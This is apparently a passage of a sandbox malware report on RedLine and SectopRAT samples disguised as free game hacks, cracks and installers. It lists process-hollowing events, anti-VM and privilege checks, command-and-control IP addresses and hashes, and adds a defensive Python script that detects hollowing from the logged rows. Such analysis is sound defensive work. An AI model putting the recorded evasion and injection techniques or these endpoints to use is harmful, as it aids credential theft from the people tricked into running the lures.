PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 2596 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

Processes

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

Network

Country Destination Domain Proto
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp

Files

memory/2596-0-0x0000000073EFE000-0x0000000073EFF000-memory.dmp

memory/2596-1-0x0000000000060000-0x00000000000FA000-memory.dmp

memory/2596-2-0x0000000073EF0000-0x00000000745DE000-memory.dmp

memory/2316-13-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-11-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-16-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2596-17-0x0000000073EF0000-0x00000000745DE000-memory.dmp

memory/2316-5-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-9-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2316-3-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-8-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-7-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2316-18-0x0000000073EF0000-0x00000000745DE000-memory.dmp

memory/2316-19-0x0000000073EF0000-0x00000000745DE000-memory.dmp

memory/2316-20-0x0000000073EF0000-0x00000000745DE000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted: 2024-11-09 16:28
Reported: 2024-11-09 16:31
Platform: win10v2004-20241007-en
Max time kernel: 138s
Max time network: 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3880 set thread context of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3880 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
PID 3880 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
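Read together, the SetThreadContext row and the WriteProcessMemory rows above are the footprint of process hollowing: the parent starts a copy of its own image, writes the payload into it and then redirects the child's main thread into that payload. Note that there are two children here: PID 4136 only receives writes, while PID 3656 receives writes and a new thread context. The same parent-writes-then-sets-context pattern appears in behavioral17, behavioral22, behavioral3 and behavioral12. The script below turns those rows into a per-pair verdict; it is an added example, not the sandbox's own detection logic, SAMPLE_EVENTS is constructed from the behavioral4 rows, the verdict names are mine, and it assumes the row grammar shown in these tables (Indicator column always N/A).

```python
"""Spot process hollowing in the sandbox's WriteProcessMemory/SetThreadContext rows.

Added example (not the sandbox's own logic). Rows follow the tables in this
report: "PID <src> wrote to memory of <dst> N/A <process> <target>" and
"PID <src> set thread context of <dst> N/A <process> <target>".
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed from the behavioral4 rows above: three writes into PID 4136 with
# no SetThreadContext, eight writes plus one SetThreadContext into PID 3656.
_IMG = r"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"
SAMPLE_EVENTS = "\n".join(
    [f"PID 3880 set thread context of 3656 N/A {_IMG} {_IMG}"]
    + [f"PID 3880 wrote to memory of 4136 N/A {_IMG} {_IMG}"] * 3
    + [f"PID 3880 wrote to memory of 3656 N/A {_IMG} {_IMG}"] * 8
)

# Image paths contain spaces, so each path is matched lazily up to ".exe".
EVENT_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<action>wrote to memory of|set thread context of) (?P<dst>\d+)"
    r"\s+\S+\s+"                                   # Indicator column (N/A here)
    r"(?P<proc>.+?\.exe)\s+(?P<target>.+?\.exe)$",
    re.IGNORECASE,
)


@dataclass
class InjectionPair:
    src: int
    dst: int
    process: str
    target: str
    writes: int = 0
    context_set: bool = False

    @property
    def verdict(self) -> str:
        same_image = self.process.lower() == self.target.lower()
        if self.writes and self.context_set:
            return "self-hollowing" if same_image else "thread-hijack-injection"
        if self.writes:
            return "write-only"       # payload staged but no thread redirected
        return "context-only"         # thread redirected with no write seen


def analyse(events: str) -> Dict[Tuple[int, int], InjectionPair]:
    """Aggregate the rows per (source PID, destination PID)."""
    pairs: Dict[Tuple[int, int], InjectionPair] = {}
    for line in events.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        key = (int(m["src"]), int(m["dst"]))
        pair = pairs.setdefault(key, InjectionPair(key[0], key[1], m["proc"], m["target"]))
        if m["action"].lower().startswith("wrote"):
            pair.writes += 1
        else:
            pair.context_set = True
    return pairs


def flagged(pairs: Dict[Tuple[int, int], InjectionPair]) -> List[Tuple[int, int]]:
    """Pairs showing both a payload write and a hijacked thread context."""
    return sorted(k for k, p in pairs.items() if p.writes and p.context_set)


if __name__ == "__main__":
    result = analyse(SAMPLE_EVENTS)
    for (src, dst), p in sorted(result.items()):
        print(f"{src} -> {dst}: {p.writes} writes, context_set={p.context_set}, {p.verdict}")
    print("flagged:", flagged(result))
```

Only (3880, 3656) is flagged; (3880, 4136) comes back as write-only, which is worth a look but is not hollowing on its own. PID 3656 is also the process whose image region 0x400000-0x41E000 appears in the Files list below as a memory dump, which is where one would expect the RedLine/SectopRAT payload signatures above to have matched, although the report does not state which dump triggered them.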

Processes

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe

"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
DE 136.244.80.139:40533 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
DE 136.244.80.139:40533 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
DE 136.244.80.139:40533 tcp
DE 136.244.80.139:40533 tcp

Files

memory/3880-0-0x0000000074B3E000-0x0000000074B3F000-memory.dmp

memory/3880-1-0x0000000000460000-0x00000000004FA000-memory.dmp

memory/3880-2-0x0000000004E60000-0x0000000004ED6000-memory.dmp

memory/3880-3-0x00000000029C0000-0x00000000029DE000-memory.dmp

memory/3880-4-0x0000000074B30000-0x00000000752E0000-memory.dmp

memory/3880-5-0x00000000055C0000-0x0000000005B64000-memory.dmp

memory/3656-6-0x0000000000400000-0x000000000041E000-memory.dmp

memory/3880-9-0x0000000074B30000-0x00000000752E0000-memory.dmp

memory/3656-10-0x0000000074B30000-0x00000000752E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CSGO FREE HACK.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/3656-11-0x0000000005290000-0x0000000005322000-memory.dmp

memory/3656-13-0x00000000054C0000-0x00000000054D2000-memory.dmp

memory/3656-12-0x0000000006300000-0x0000000006918000-memory.dmp

memory/3656-14-0x0000000006070000-0x00000000060AC000-memory.dmp

memory/3656-15-0x00000000061C0000-0x000000000620C000-memory.dmp

memory/3656-16-0x0000000074B30000-0x00000000752E0000-memory.dmp

memory/3656-17-0x0000000007C90000-0x0000000007D9A000-memory.dmp

memory/3656-18-0x0000000074B30000-0x00000000752E0000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted: 2024-11-09 16:28
Reported: 2024-11-09 16:31
Platform: win10v2004-20241007-en
Max time kernel: 94s
Max time network: 149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Installer.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3916 set thread context of 4476 N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Installer.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Installer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Installer.exe

"C:\Users\Admin\AppData\Local\Temp\Installer.exe"

C:\Users\Admin\AppData\Local\Temp\Installer.exe

C:\Users\Admin\AppData\Local\Temp\Installer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4476 -ip 4476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 12

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/3916-0-0x00000000752CE000-0x00000000752CF000-memory.dmp

memory/3916-1-0x0000000000800000-0x0000000000912000-memory.dmp

memory/3916-2-0x00000000752C0000-0x0000000075A70000-memory.dmp

memory/3916-3-0x0000000005940000-0x0000000005EE4000-memory.dmp

memory/3916-4-0x0000000005390000-0x0000000005422000-memory.dmp

memory/3916-5-0x0000000005350000-0x000000000535A000-memory.dmp

memory/3916-6-0x00000000056F0000-0x0000000005712000-memory.dmp

memory/4476-7-0x0000000000400000-0x0000000000420000-memory.dmp

memory/3916-9-0x00000000752C0000-0x0000000075A70000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2996 set thread context of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2996 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
PID 2996 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe

"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
RU 109.248.201.150:63757 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
RU 109.248.201.150:63757 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
RU 109.248.201.150:63757 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
RU 109.248.201.150:63757 tcp
RU 109.248.201.150:63757 tcp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp

Files

memory/2996-0-0x00000000753AE000-0x00000000753AF000-memory.dmp

memory/2996-1-0x0000000000AD0000-0x0000000000C14000-memory.dmp

memory/2996-2-0x0000000005B10000-0x00000000060B4000-memory.dmp

memory/2996-3-0x0000000005600000-0x0000000005692000-memory.dmp

memory/2996-5-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/2996-4-0x00000000056C0000-0x00000000056CA000-memory.dmp

memory/2996-6-0x00000000753AE000-0x00000000753AF000-memory.dmp

memory/2996-7-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/2996-8-0x0000000005740000-0x0000000005762000-memory.dmp

memory/2996-9-0x00000000057E0000-0x0000000005856000-memory.dmp

memory/2996-10-0x0000000005860000-0x000000000587E000-memory.dmp

memory/2180-11-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2996-13-0x00000000753A0000-0x0000000075B50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Minecraft_v4.5.exe.log

MD5 fb3264819f05b468156e37fecd7ca1e7
SHA1 8461be627ec2c21766472ac5a9215204f6cd03d6
SHA256 902e22368b4d29d67c78eb445d67c7e36001a79c7701a1e171a9c7af457a739c
SHA512 ddcb2a199799dc30a5627d6bb2aff30aca350b52e15f574ecc9e9e9e4d388fd1fe808b5fd2a8ea7015c91e369a06f045be455bf070c6d20d8c3b1c06de8ef964

memory/2180-15-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/2180-17-0x00000000051D0000-0x00000000051E2000-memory.dmp

memory/2180-16-0x0000000005790000-0x0000000005DA8000-memory.dmp

memory/2180-18-0x0000000005230000-0x000000000526C000-memory.dmp

memory/2180-19-0x0000000005270000-0x00000000052BC000-memory.dmp

memory/2180-20-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/2180-21-0x00000000054E0000-0x00000000055EA000-memory.dmp

memory/2180-22-0x00000000753A0000-0x0000000075B50000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bird.exe"

Signatures

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Bird.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Bird.exe

"C:\Users\Admin\AppData\Local\Temp\Bird.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
FI 65.21.103.71:56458 tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
FI 65.21.103.71:56458 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 73.209.201.84.in-addr.arpa udp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
FI 65.21.103.71:56458 tcp
FI 65.21.103.71:56458 tcp

Files

memory/4156-0-0x0000000000780000-0x0000000000DDE000-memory.dmp

memory/4156-1-0x0000000076370000-0x0000000076371000-memory.dmp

memory/4156-2-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-3-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-4-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-8-0x0000000000780000-0x0000000000DDE000-memory.dmp

memory/4156-9-0x0000000005FA0000-0x0000000006544000-memory.dmp

memory/4156-10-0x0000000006B70000-0x0000000007188000-memory.dmp

memory/4156-11-0x0000000005AD0000-0x0000000005B62000-memory.dmp

memory/4156-12-0x0000000005A80000-0x0000000005A92000-memory.dmp

memory/4156-13-0x0000000005BB0000-0x0000000005BEC000-memory.dmp

memory/4156-14-0x0000000005F10000-0x0000000005F5C000-memory.dmp

memory/4156-15-0x00000000069F0000-0x0000000006AFA000-memory.dmp

memory/4156-16-0x0000000000780000-0x0000000000DDE000-memory.dmp

memory/4156-17-0x0000000076370000-0x0000000076371000-memory.dmp

memory/4156-18-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-19-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-20-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-21-0x0000000076350000-0x0000000076440000-memory.dmp

memory/4156-23-0x0000000076350000-0x0000000076440000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

136s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

System Binary Proxy Execution: Regsvcs/Regasm

defense_evasion
Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
Key opened \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1636 set thread context of 11756 N/A C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
